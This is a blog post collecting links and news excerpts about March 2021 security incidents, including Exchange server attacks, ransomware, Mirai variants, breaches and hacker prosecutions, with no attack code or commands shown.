This posting is here to collect cyber security news in March 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
This posting is here to collect cyber security news in March 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
342 Comments
Tomi Engdahl says:
Judge rules Google has to face lawsuit that claims it tracks users even in Incognito mode
The plaintiffs allege Google collects personal data even if users put privacy controls in place
https://www.theverge.com/2021/3/13/22329240/judge-rules-google-5-billion-lawsuit-tracking-chrome-incognito-privacy
Tomi Engdahl says:
Exchange servers first compromised by Chinese hackers hit with ransomware
As if Exchange users didn’t already have enough to worry about, they have this.
https://arstechnica.com/gadgets/2021/03/ransomware-gangs-hijack-7000-exchange-servers-first-hit-by-chinese-hackers/?utm_social-type=owned&utm_source=facebook&utm_brand=ars&utm_medium=social
Tomi Engdahl says:
How Quickly Are We Patching Microsoft Exchange Servers?
https://blog.paloaltonetworks.com/2021/03/patching-microsoft-exchange-servers/
Fifteen years ago, if you accidentally exposed a device on the
Internet, it might go unnoticed by attackers for months or even years.
Things are different today – attackers scrutinize your attack surface
daily. With open source software anyone can download, an attacker can
communicate with every public-facing IP address in IPv4 space in
hours. Any unpatched system, misconfiguration or accidental exposure
is likely to be discovered very quickly. The internet is tiny.
HAFNIUM, China Chopper and ASP.NET Runtime
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/
The China Chopper server-side ASPX web shell is extremely small and
typically, the entire thing is just one line. There are multiple
versions of this web shell for executing code in different languages
such as ASP, ASPX, PHP, JSP, and CFM. In this blog, we will cover the
JScript version; however, they all are very similar aside from the
language used.
Tomi Engdahl says:
Microsoft Exchange server exploitation: how to detect, mitigate, and
stay calm
https://redcanary.com/blog/microsoft-exchange-attacks/
Red Canary Intel is tracking multiple activity clusters exploiting
vulnerable Microsoft Exchange servers to drop web shells, including
one we’ve dubbed “Sapphire Pigeon.”
Verkossa on käynnissä hiljainen katastrofi “kymmeniä tai satoja
Vastaamon tyyppisiä tietomurtoja”
https://www.is.fi/digitoday/tietoturva/art-2000007861992.html
ProxyLogon-nimellä tunnettu, Microsoftin sähköpostipalvelimiin
kohdistuva tietomurto on laaja, ja tietoa varastetaan koko ajan.
Suomalaisten mahdollisuudet vastata uhkaan vaihtelevat.
Tomi Engdahl says:
Telia Inmics-Nebula sulki yrittäjien sähköposteja katko kestänyt jo
yli 4 päivää
https://www.tivi.fi/uutiset/tv/32465f1b-8d6d-47df-a01c-9d943517f284
Päiväkausia kestävä katkos sähköpostin toiminnassa voi tehdä olon
tukalaksi. Tukalaa on nyt joillakin Telia Inmics-Nebulan
yritysasiakkailla.
Tomi Engdahl says:
Phishing sites now detect virtual machines to bypass detection
https://www.bleepingcomputer.com/news/security/phishing-sites-now-detect-virtual-machines-to-bypass-detection/
Phishing sites are now using JavaScript to evade detection by checking
whether a visitor is browsing the site from a virtual machine or
headless device.
Tomi Engdahl says:
Haluatko lisätä tietoturvaa helposti? Näin kaksivaiheinen
tunnistautuminen tapahtuu helpoimmin
https://www.kauppalehti.fi/uutiset/haluatko-lisata-tietoturvaa-helposti-nain-kaksivaiheinen-tunnistautuminen-tapahtuu-helpoimmin/c7e1ef81-e46a-422d-885b-8bf82f3a9c8b
Osaatko pitää tietosi turvassa verkossa? Käyttäjätilin turvallisuutta
voi helposti lisätä kaksivaiheisella tunnistuksella. [TILAAJILLE]
Tomi Engdahl says:
Microsoft 365 outage knocks down Teams, Exchange Online
https://www.bleepingcomputer.com/news/microsoft/microsoft-365-outage-knocks-down-teams-exchange-online/
A Microsoft 365 outage is preventing users from logging into Microsoft
Teams, Exchange Online, Forms, Xbox Live, and Yammer.. Based on
reports from users, this appears to be a worldwide outage.
Tomi Engdahl says:
Joseph Cox / VICE:
Hacker paid a company called Sakari $16 to reroute a reporter’s texts and used SMS 2FA to break into his accounts, showing the need for regulation of SMS tools — A gaping flaw in SMS lets hackers take over phone numbers in minutes,by simply paying a company to reroute text messages. — Joseph Cox
A Hacker Got All My Texts for $16
A gaping flaw in SMS lets hackers take over phone numbers in minutes by simply paying a company to reroute text messages.
https://www.vice.com/en/article/y3g8wb/hacker-got-my-texts-16-dollars-sakari-netnumber
Tomi Engdahl says:
Google Releases PoC Exploit for Browser-Based Spectre Attack
https://www.securityweek.com/google-releases-poc-exploit-browser-based-spectre-attack
Tomi Engdahl says:
‘We have seen no indication of compromise of the Nifty Gateway platform’
Hackers stole NFTs from Nifty Gateway users
‘We have seen no indication of compromise of the Nifty Gateway platform’
https://www.theverge.com/2021/3/15/22331818/nifty-gateway-hack-steal-nfts-credit-card
Over the weekend, some users of NFT marketplace Nifty Gateway said hackers stole digital artwork worth thousands of dollars from their accounts. Some people who were hacked also said their credit cards on file were used to purchase additional NFTs, also costing thousands of dollars, which were then transferred away to a hacker’s account.
Nifty Gateway confirmed in a statement to The Verge that some accounts without two-factor authentication had been hacked and that it has been in touch with those affected, but it said it has not seen evidence that its platform was breached. Nifty Giveaway suggests the hackers may have successfully reused login credentials that leaked from other services.
Over the past few weeks, many NFTs have suddenly become high-value assets; Grimes sold a series of 10 digital artworks for around $6 million, for example, and digital artist Beeple sold an NFT for $69 million at Christie’s. So it’s unfortunately not altogether surprising that NFT platforms have become targets for hackers looking to steal the digital artworks or take credit card information to buy more.
WHAT’S AN NFT?
NFTs allow you to buy and sell ownership of unique digital items and keep track of who owns them using the blockchain. NFT stands for “non-fungible token,” and it can technically contain anything digital, including drawings, animated GIFs, songs, or items in video games. An NFT can either be one-of-a-kind, like a real-life painting, or one copy of many, like trading cards, but the blockchain keeps track of who has ownership of the file.
NFTs have been making headlines lately, some selling for millions of dollars, with high-profile memes like Nyan Cat and the “deal with it” sunglasses being put up for auction. There’s also a lot of discussion about the massive electricity use and environmental impacts of NFTs. If you (understandably) still have questions, you can read through our NFT FAQ.
Tomi Engdahl says:
One-Click Microsoft Exchange On-Premises Mitigation Tool March 2021
https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/
Microsoft has released a new, one-click mitigation tool, Microsoft
Exchange On-Premises Mitigation Tool to help customers who do not have
dedicated security or IT teams to apply these security updates. We
have tested this tool across Exchange Server 2013, 2016, and 2019
deployments. This new tool is designed as an interim mitigation for
customers who are unfamiliar with the patch/update process or who have
not yet applied the on-premises Exchange security update.
The Microsoft Exchange hacks: How they started and where we are
https://www.bleepingcomputer.com/news/security/the-microsoft-exchange-hacks-how-they-started-and-where-we-are/
With patches released and proof-of-concept (PoC) exploit code
surfacing online, thousands of Microsoft Exchange servers worldwide
continue to remain vulnerable and the number of attacks is still at a
worrying level.
Tomi Engdahl says:
McAfee Defender’s Blog: Operation Dianxun
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-defenders-blog-operation-dianxun
In a recent report the McAfee Advanced Threat Research (ATR) Strategic
Intelligence team disclosed an espionage campaign, targeting
telecommunication companies, named Operation Diànxn. The tactics,
techniques and procedures (TTPs) used in the attack are like those
observed in earlier campaigns publicly attributed to the threat actors
RedDelta and Mustang Panda. Most probably this threat is targeting
people working in the telecommunications industry and has been used
for espionage purposes to access sensitive data and to spy on
companies related to 5G technology.
Tomi Engdahl says:
New Mirai Variant Targeting Network Security Devices
https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
The attacks are still ongoing at the time of this writing. Upon
successful exploitation, the attackers try to download a malicious
shell script, which contains further infection behaviors such as
downloading and executing Mirai variants and brute-forcers.
Tomi Engdahl says:
Microsoft’s latest cloud authentication outage: What went wrong
https://www.zdnet.com/article/microsofts-latest-cloud-authentication-outage-what-went-wrong/
Microsoft is saying a ‘rotation of keys’ that handle authentication
was to blame for a roughly 14-hour Azure outage that took down Office
365, Dynamics 365, Xbox Live and other Microsoft services on March
15.. also: https://status.azure.com/en-us/status/history/
Tomi Engdahl says:
Top 10 Cloud Malware Threats
https://www.intezer.com/blog/cloud-security/top-10-cloud-malware-threats/
For a long time Linux has not been seen as a serious target of threat
actors. This operating system makes up such a small percentage of the
desktop market share compared to Windows, it’s no surprise why threat
actors would focus most of their attention on attacking Windows
endpoints. Times are quickly changing though as the next major
battleground moves from traditional on-premise Windows endpoints to
Linux-based servers and containers in the cloud. For perspective 90%
of the public cloud runs Linux. Attackers are taking note. Some have
started to write new malware from scratch exclusively for Linux, while
others are adapting their existing Windows malware to target Linux.
Tomi Engdahl says:
Magecart Attackers Save Stolen Credit-Card Data in.JPG File
https://threatpost.com/magecart-attackers-stolen-data-jpg/164815/
Magecart attackers have found a new way to hide their nefarious online
activity by saving data they’ve skimmed from credit cards online in
a.JPG file on a website they’ve injected with malicious code. “The
creative use of the fake.JPG allows an attacker to conceal and store
harvested credit card details for future use without gaining too much
attention from the website owner, ” he wrote.
Tomi Engdahl says:
Russia Threatens to Block Twitter in a Month
https://www.securityweek.com/russia-threatens-block-twitter-month
Russian authorities said Tuesday they would block Twitter in a month if it doesn’t take steps to remove banned content, a move that escalates the Russian government’s drawn-out standoff with social media platforms that have played a major role in amplifying dissent in Russia.
Russia’s state communications watchdog, Roskomnadzor, last week announced it was slowing down the speed of uploading photos and videos to Twitter over its alleged failure to remove content encouraging suicide among children and information about drugs and child pornography.
The agency said Twitter has failed to remove more than 3,000 posts with banned content, including more than 2,500 posts encouraging suicide among minors. The platform responded by emphasizing its policy of zero tolerance for child sexual exploitation, promotion of suicide and drug sales.
Tomi Engdahl says:
Danny Palmer / ZDNet:
McAfee researchers detail a Chinese cyberespionage campaign targeting at least 23 telcos in the US, Europe, and SE Asia to steal data, including for 5G tech — Cybersecurity researchers at McAfee detail an ongoing cyber espionage campaign which is targeting telecoms companies around the world.
Hackers are targeting telecoms companies to steal 5G secrets
https://www.zdnet.com/article/hackers-are-targeting-telecoms-companies-to-steal-5g-secrets/
Cybersecurity researchers at McAfee detail an ongoing cyber-espionage campaign that is targeting telecoms companies around the world.
Tomi Engdahl says:
Microsoft’s latest cloud authentication outage: What went wrong
https://www.zdnet.com/article/microsofts-latest-cloud-authentication-outage-what-went-wrong/?ftag=COS-05-10aaa0h&utm_campaign=trueAnthem%3A+Trending+Content&utm_medium=trueAnthem&utm_source=facebook
Microsoft is saying a ‘rotation of keys’ that handle authentication was to blame for a roughly 14-hour Azure outage that took down Office 365, Dynamics 365, Xbox Live and other Microsoft services on March 15.
Microsoft’s preliminary analysis of the incident, published March 16, indicated that “an error occurred in the rotation of keys used to support Azure AD’s use of OpenID, and other, Identity standard protocols for cryptographic signing operations,” according to the findings published to its Azure Status History page.
https://status.azure.com/en-us/status/history/
Tomi Engdahl says:
Microsoft Exchange Server: These quarterly updates include fixes for
security flaws
https://www.zdnet.com/article/microsoft-exchange-server-these-quarterly-updates-include-fixes-for-security-flaws/
Microsoft has released its March 2021 quarterly cumulative updates for
Exchange Server 2016 and Exchange Server 2019, which include the
security updates to address critical flaws that are currently under
attack.. also:
https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-quarterly-exchange-updates/ba-p/2205283
Tomi Engdahl says:
PYSA Ransomware Pillages Education Sector, Feds Warn
https://threatpost.com/pysa-ransomware-education-feds-warn/164832/
A major spike of attacks against higher ed, K-12 and seminaries in
March has prompted the FBI to issue a special alert. In a “Flash”
alert to the cybersecurity community issued on Tuesday, the Feds said
that PYSA has been seen in attacks on schools in 12 U.S. states and in
the United Kingdom in March alone.
Tomi Engdahl says:
Mastermind of 2020′s top celebrity Twitter hack sentenced to 3 years
https://www.hackread.com/twitter-hack-mastermind-jailed-2020-celebrity-hack/
Graham Ivan Clark, the mastermind of the high-profile Twitter hack
leading to the Bitcoin scam on July 15th, 2020 has been sentenced to 3
years in prison. Clark was arrested on July 31st, 2020 from Tampa,
Florida when he was 17 and charged with multiple counts of organized
fraud, communications fraud, fraudulent use of personal information,
and accessing computer or electronic device without authority.
US Teen ‘Mastermind’ in Epic Twitter Hack Sentenced to Prison
https://www.securityweek.com/florida-teen-sentenced-hack-celebrity-twitter-accounts
A Florida teenager accused of masterminding a Twitter hack of celebrity accounts in a crypto currency scheme has been sentenced to three years in juvenile prison in a plea agreement, officials said.
State prosecutors announced the deal Tuesday in the case of Graham Ivan Clark, 18, described as the mastermind of the July 2020 “Bit-Con” worldwide hack of Twitter accounts of Elon Musk, Bill Gates, Barack Obama, Joe Biden and others.
Hillsborough County State Attorney Andrew Warren said Clark, who was 17 when he was charged, would serve three years in a juvenile prison followed by three years probation, the maximum allowed under Florida’s Youthful Offender Act.
If Clark violates his probation, he will face a minimum 10-year sentence in adult prison.
Tomi Engdahl says:
Mimecast Says SolarWinds Hackers Stole Source Code
https://www.securityweek.com/mimecast-says-solarwinds-hackers-stole-source-code
Email security company Mimecast on Tuesday said it completed its forensic investigation into the impact of the SolarWinds supply chain attack, and revealed that the threat actor managed to steal some source code.
Mimecast was one of the several cybersecurity companies to confirm being targeted by the hackers who breached the systems of IT management solutions provider SolarWinds.
Tomi Engdahl says:
New Mirai Variant Leverages 10 Vulnerabilities to Hijack IoT Devices
https://www.securityweek.com/new-mirai-variant-leverages-10-vulnerabilities-hijack-iot-devices
Over the past month, a variant of the Mirai botnet was observed targeting new security vulnerabilities within hours after they had been disclosed publicly, researchers with Palo Alto Networks reveal.
Around since 2016, Mirai has had its source code leaked online, which resulted in tens of variants being released over the years, each with its own targeting capabilities.
What makes the variant tracked by Palo Alto Networks stand out in the crowd is the fact that, within a four-week timeframe, it started exploiting several vulnerabilities that have been disclosed this year.
On February 23, the Mirai variant was observed targeting CVE-2021-27561 and CVE-2021-27562, two vulnerabilities in the Yealink DM (Device Management) platform that had been disclosed the very same day.
Impacting Yealink DM version 3.6.0.20 and older, the flaws (pre-auth SSRF and command injection, respectively) exist because user-provided data is not properly filtered and could be exploited to execute arbitrary commands as root, without authentication.
On March 3, Palo Alto Networks’ security researchers noticed that the same samples were also using an exploit for CVE-2021-22502, a critical (CVSS score of 9.8) remote code execution vulnerability in Micro Focus Operations Bridge Reporter.
Exploitable without authentication, the security bug exists because a user-supplied string isn’t properly validated when the Token parameter provided to the LogonResource endpoint is handled, allowing an attacker to execute code as root.
Ten days later, on March 13, the samples also incorporated an exploit targeting CVE-2020-26919, a critical vulnerability (CVSS score 9.8) affecting NETGEAR JGS516PE business-grade gigabit switches. The bug is described as “lack of access control at the function level.”
In September 2020, Netgear published an advisory for this vulnerability, advising customers to update the firmware on their devices.
Other vulnerabilities being exploited in these attacks include a SonicWall SSL-VPN bug referred to as VisualDoor, CVE-2020-25506 (D-Link DNS-320 firewall), CVE-2020-26919 (Netgear ProSAFE Plus), and CVE-2019-19356 (Netis WF2419 wireless router). Three other security issues are also being exploited, but they haven’t been identified yet.
Tomi Engdahl says:
“End of the road. Nothing to do, and no hope of things getting better”?
“Expert” hackers used 11 zerodays to infect Windows, iOS, and Android users
The breadth and abundance of exploits for unknown vulnerabilities sets group apart.
https://arstechnica.com/information-technology/2021/03/expert-hackers-used-11-zerodays-to-infect-windows-ios-and-android-users/
A team of advanced hackers exploited no fewer than 11 zeroday vulnerabilities in a nine-month campaign that used compromised websites to infect fully patched devices running Windows, iOS, and Android, a Google researcher said.
Using novel exploitation and obfuscation techniques, a mastery of a wide range of vulnerability types, and a complex delivery infrastructure, the group exploited four zerodays in February 2020. The hackers’ ability to chain together multiple exploits that compromised fully patched Windows and Android devices led members of Google’s Project Zero and Threat Analysis Group to call the group “highly sophisticated.”
Not over yet
Tomi Engdahl says:
Sean Coughlan / BBC:
London police warn students about using Sci-Hub, calling the self-described “pirate” site for research papers “a threat to their personal information and data” — Police have warned students in the UK against using a website that they say lets users “illegally access” millions of scientific research papers.
Police warn students to avoid science website
https://www.bbc.com/news/education-56462390
Police have warned students in the UK against using a website that they say lets users “illegally access” millions of scientific research papers.
The City of London police’s Intellectual Property Crime Unit says using the Sci-Hub website could “pose a threat” to students’ personal data.
The police are concerned that users of the “Russia-based website” could have information taken and misused online.
The Sci-Hub website says it “removes all barriers” to science.
It offers open access to more than 85 million scientific papers and claims that copyright laws should be abolished and that such material should be “knowledge to all”.
It describes itself as “the first pirate website in the world to provide mass and public access to tens of millions of research papers”.
University ‘threat’
But Max Bruce, the City of London police’s cyber protection officer, has urged universities to block the website on their networks because of the “threat posed by Sci-Hub to both the university and its students”.
“If you’re tricked into revealing your log-in credentials, whether it’s through the use of fake emails or malware, we know that Sci-Hub will then use those details to compromise your university’s computer network in order to steal research papers,” he said.
The City of London Police, which is the national lead for fraud, has warned that students studying online at home might be vulnerable.
‘Access to research’
The police warning says scientific papers could have been obtained by a “variety of malicious means, such as the use of phishing emails to trick university staff and students into divulging their login credentials”.
But the Sci-Hub website has previously told the BBC that it provides students with access to research papers for which the subscriptions are “very expensive”.
Tomi Engdahl says:
Catalin Cimpanu / The Record:
Verkada security camera hacker has been charged in the US for hacking into 100+ of the world’s biggest companies since 2019 and leaking proprietary data online
More: U.S. Department of Justice, The Verge, Forbes, HackRead, Dark Reading, infosecurity-magazine.com, PCMag, Gizmodo, New York Post, San Francisco Business Journal, The Hacker News, and Silicon Republic
Verkada hacker charged in the US for hacking more than 100 companies
https://therecord.media/verkada-hacker-charged-in-the-us-for-hacking-more-than-100-companies/
The US Department of Justice has charged today a Swiss national for hacking into more than 100 companies and leaking proprietary data online on their personal website.
The hacker, Till (more commonly known as Tillie) Kottmann, 21, of Lucerne, Switzerland, is also the individual who breached cloud-based surveillance firm Verkada earlier this month and leaked security camera footage from some of its customers —including streams from companies like Tesla, Cloudflare, Okta, but also jails, schools, and hospitals.
But according to court documents published by the DOJ today, the charges predate Kottmann’s Verkada hack and pertain to the Swiss hacktivist’s activity dating back to 2019, when they began scouring the internet for misconfigured source code repositories owned by major corporations and government organizations.
Tomi Engdahl says:
U.S. charges 21-year-old Swiss “hacktivist” for security-camera theft and leaks
https://www.cbsnews.com/news/till-kottmann-verkada-hack-charged-identity-theft-computer-intrusion/
The Justice Department has charged a Swiss hacker with computer intrusion and identity theft, just over a week after the hacker took credit for helping to break into the online systems of a U.S. security-camera startup. An indictment against 21-year-old Till Kottmann was brought Thursday by a grand jury in the Seattle-based Western District of Washington.
Tomi Engdahl says:
Catalin Cimpanu / The Record:
REvil ransomware gang says it had breached Acer, sharing leaked images of internal docs on the dark web, and is demanding $50M; Acer says it is investigating — Taiwanese computer maker Acer has suffered a ransomware attack over the past weekend at the hands of the REvil ransomware gang …
Ransomware gang demands $50 million from computer maker Acer
https://therecord.media/ransomware-gang-demands-50-million-from-computer-maker-acer/
Taiwanese computer maker Acer has suffered a ransomware attack over the past weekend at the hands of the REvil ransomware gang, which is now demanding a whopping $50 million ransom payment to decrypt the company’s computers and not leak its data on the dark web.
The attack has not disrupted production systems but only hit the company’s back-office network. The security breach was not deemed disruptive enough to prevent or delay the computer maker from announcing its Q4 2020 financial results on Wednesday.
Acer spokespersons have played down the incident when reached out for comment and have avoided confirming it as a ransomware incident.
Here the ransom demand was clearly visible, a whopping $50 million payment request, which represents the highest ransom demand ever requested by a ransomware group.
Acer is the sixth-largest personal computer maker in the world, with a market share of roughly 6% of all global sales. The company reported a total revenue of roughly $3 billion in Q4 2020, hence the record-breaking ransom demand.
Tomi Engdahl says:
“Expert” hackers used 11 0-days to infect Windows, iOS, and Android
users
https://arstechnica.com/information-technology/2021/03/expert-hackers-used-11-zerodays-to-infect-windows-ios-and-android-users/
A team of advanced hackers exploited no fewer than 11 zero-day
vulnerabilities in a nine-month campaign that used compromised
websites to infect fully patched devices running Windows, iOS, and
Android, a Google researcher said. Also:
https://googleprojectzero.blogspot.com/2021/03/in-wild-series-october-2020-0-day.html
Tomi Engdahl says:
REvil ransomware says they hit Acer, Acer reports “abnormal
situations”
https://www.bleepingcomputer.com/news/security/revil-ransomware-says-they-hit-acer-acer-reports-abnormal-situations/
The REvil ransomware operation claims to have stolen unencrypted data
after hacking electronics and computer giant Acer.
Tomi Engdahl says:
Russian pleads guilty to Tesla hacking and extortion attempt
https://www.bleepingcomputer.com/news/security/russian-pleads-guilty-to-tesla-hacking-and-extortion-attempt/
Russian national Egor Igorevich Kriuchkov has pleaded guilty to
recruiting a Tesla employee to plant malware designed to steal data
within the network of Tesla’s Nevada Gigafactory.
Tomi Engdahl says:
Mysterious bug is deleting Microsoft Teams, SharePoint files
https://www.bleepingcomputer.com/news/microsoft/mysterious-bug-is-deleting-microsoft-teams-sharepoint-files/
Microsoft SharePoint and Microsoft Teams users report files are
missing or moved to the Recycle Bin after the recent Azure Active
Directory outage this week.
Tomi Engdahl says:
CISA releases new SolarWinds malicious activity detection tool
https://www.bleepingcomputer.com/news/security/cisa-releases-new-solarwinds-malicious-activity-detection-tool/
The Cybersecurity and Infrastructure Security Agency (CISA) has
released a new tool to detect post-compromise malicious activity
associated with the SolarWinds hackers in on-premises enterprise
environments. CISA Hunt and Incident Response Program (CHIRP), the new
forensics collection tool, is a Python-based tool that helps detect
SolarWinds malicious activity IOCs on Windows operating systems. Also:
https://www.zdnet.com/article/burnt-by-solarwinds-attack-us-releases-tool-for-post-compromise-detection/.
Also:
https://us-cert.cisa.gov/ncas/current-activity/2021/03/18/using-chirp-detect-post-compromise-threat-activity-premises
Tomi Engdahl says:
Statement on Microsoft Exchange vulnerabilities
https://www.enisa.europa.eu/news/enisa-news/statement-on-microsoft-exchange-vulnerabilities
The EU Agency for Cybersecurity (ENISA) has provided a statement with
an assessment and advice on Microsoft Exchange vulnerabilities.
Microsoft Defender Antivirus now automatically mitigates Exchange
Server vulnerabilities
https://www.zdnet.com/article/microsoft-defender-antivirus-now-patches-exchange-server-vulnerabilities/
Mitigation fixes will be applied automatically in a renewed effort by
Microsoft to contain security incidents caused by the bugs.
Tomi Engdahl says:
Bitcoin-kiristysviestit jatkuvat
https://poliisi.fi/-/bitcoin-kiristysviestit-jatkuvat
Hämeen poliisilaitos on saanut tietoonsa jälleen kymmeniä
yksityishenkilöille lähetettyjä kiristysviestejä, joissa vaaditaan
vastaanottajaa maksamaan 1450 euron arvosta Bitcoineja kiristäjän
lompakkoon tai muuten hänestä levitetään arkaluonteista tietoa. Myös:
https://www.is.fi/digitoday/tietoturva/art-2000007869545.html
Tomi Engdahl says:
Microsoft Releases Exchange On-premises Mitigation Tool
https://us-cert.cisa.gov/ncas/current-activity/2021/03/16/microsoft-releases-exchange-premises-mitigation-tool
Microsoft has released the Exchange On-premises Mitigation Tool
(EOMT.ps1) that can automate portions of both the detection and
patching process. Microsoft stated the following along with the
release: “[the tool is intended] to help customers who do not have
dedicated security or IT teams to apply these security updates.
Tomi Engdahl says:
Polish State Websites Hacked and Used to Spread False Info
https://www.securityweek.com/polish-state-websites-hacked-and-used-spread-false-info
Two Polish government websites were hacked Wednesday and used briefly
to spread false information about a non-existent radioactive threat,
in what a Polish government official said had the hallmarks of a
Russian cyberattack.
Tomi Engdahl says:
~4, 300 publicly reachable servers are posing a new DDoS hazard to the
Internet
https://arstechnica.com/gadgets/2021/03/mainstream-ddosers-are-abusing-d-tls-servers-to-up-the-potency-of-attacks/
DDoS-for-hire services adopt new technique that amplifies attacks 37
fold. DDoS mitigation provider Netscout said on Wednesday that it has
observed DDoS-for-hire services adopting a new amplification vector.
The vector is the Datagram Transport Layer Security, or D/TLS, which
(as its name suggests) is essentially the Transport Layer Security for
UDP data packets. The biggest D/TLS-based attacks Netscout has
observed delivered about 45Gbps of traffic. The people responsible for
the attack combined it with other amplification vectors to achieve a
combined size of about 207Gbps.
Tomi Engdahl says:
Necro upgrades again, using Tor + dynamic domain DGA and aiming at
both Windows & Linux
https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/
Tomi Engdahl says:
Flaws in Two Popular WordPress Plugins Affect Over 7 Million Websites
https://thehackernews.com/2021/03/flaws-in-two-popular-wordpress-plugins.html
Researchers have disclosed vulnerabilities in multiple WordPress
plugins that, if successfully exploited, could allow an attacker to
run arbitrary code and take over a website in certain scenarios. The
flaws were uncovered in Elementor, a website builder plugin used on
more than seven million sites, and WP Super Cache, a tool used to
serve cached pages of a WordPress site.
Tomi Engdahl says:
Hackers are exploiting a server vulnerability with a severity of 9.8
out of 10
https://arstechnica.com/gadgets/2021/03/to-security-pros-dread-another-critical-server-vulnerability-is-under-exploit/
As if the mass-exploitation of Exchange servers wasn’t enough, now
there’s BIG-IP. Last week, F5 disclosed and patched critical BIG-IP
vulnerabilities that allow hackers to gain complete control of a
server. Despite a severity rating of 9.8 out of 10, the security flaws
got overshadowed by a different set of critical vulnerabilities
Microsoft disclosed and patched in Exchange server a week earlier.
Also:
https://thehackernews.com/2021/03/latest-f5-big-ip-bug-under-active.html
Tomi Engdahl says:
The Week in Ransomware – March 19th 2021 – Highest ransom ever!
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-19th-2021-highest-ransom-ever/
While the beginning of this week was fairly quiet, it definitely ended
with a bang as news came out of the largest ransom demand yet.
Tomi Engdahl says:
Russian Man Pleads Guilty to Role in Attempt to Plant Malware on Tesla Systems
https://www.securityweek.com/russian-man-pleads-guilty-role-attempt-plant-malware-tesla-systems
Tomi Engdahl says:
Finland IDs Hackers Linked to Parliament Spying Attack
https://www.securityweek.com/finland-ids-hackers-linked-parliament-spying-attack
Finland’s domestic security agency said Thursday that the cybergroup APT31, which is generally linked to the Chinese government, was likely behind a cyberspying attack on the information systems of the Nordic country’s parliament.
The Finnish Security and Intelligence Service, known by the abbreviation Supo, said it had “identified a cyber espionage operation targeted in 2020 against parliament with the aim of intruding into parliament’s IT systems.”
The agency added that “according to Supo intelligence, APT31 was responsible for the attack”. It didn’t mention China by name or the group’s alleged links to the government in Beijing. The statement posted also on the agency’s Twitter site in English.
Finland’s National Bureau of Investigation, NBI, said late December that it had started an investigation into suspected gross hacking and espionage attacks on the information systems of Eduskunta, the Finnish legislature. Among other things, some lawmakers’ email accounts were compromised.
Parliament has since upgraded the systems’ security features.
Tomi Engdahl says:
DDoS booters now abuse DTLS servers to amplify attacks
https://www.bleepingcomputer.com/news/security/ddos-booters-now-abuse-dtls-servers-to-amplify-attacks/
DDoS-for-hire services are now actively abusing misconfigured or
out-of-date Datagram Transport Layer Security (D/TLS) servers to
amplify Distributed Denial of Service (DDoS) attacks.
Tomi Engdahl says:
“Hack everybody you can”: What to know about the massive Microsoft Exchange breach
https://www.cbsnews.com/news/microsoft-exchange-server-hack-what-to-know/
Tomi Engdahl says:
Cybersecurity researchers on Sunday disclosed multiple critical
vulnerabilities in remote student monitoring software Netop Vision Pro
that a malicious attacker could abuse to execute arbitrary code and
take over Windows computers
https://thehackernews.com/2021/03/popular-netops-remote-learning-software.html
“These findings allow for elevation of privileges and ultimately
remote code execution which could be used by a malicious attacker
within the same network to gain full control over students’ computers,
” the McAfee Labs Advanced Threat Research team said in an analysis.
Also:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/netop-vision-pro-distance-learning-software-is-20-20-in-hindsight/
Tomi Engdahl says:
Energy giant Shell discloses data breach after Accellion hack
https://www.bleepingcomputer.com/news/security/energy-giant-shell-discloses-data-breach-after-accellion-hack/
Energy giant Shell has disclosed a data breach after attackers
compromised the company’s secure file-sharing system powered by
Accellion’s File Transfer Appliance (FTA).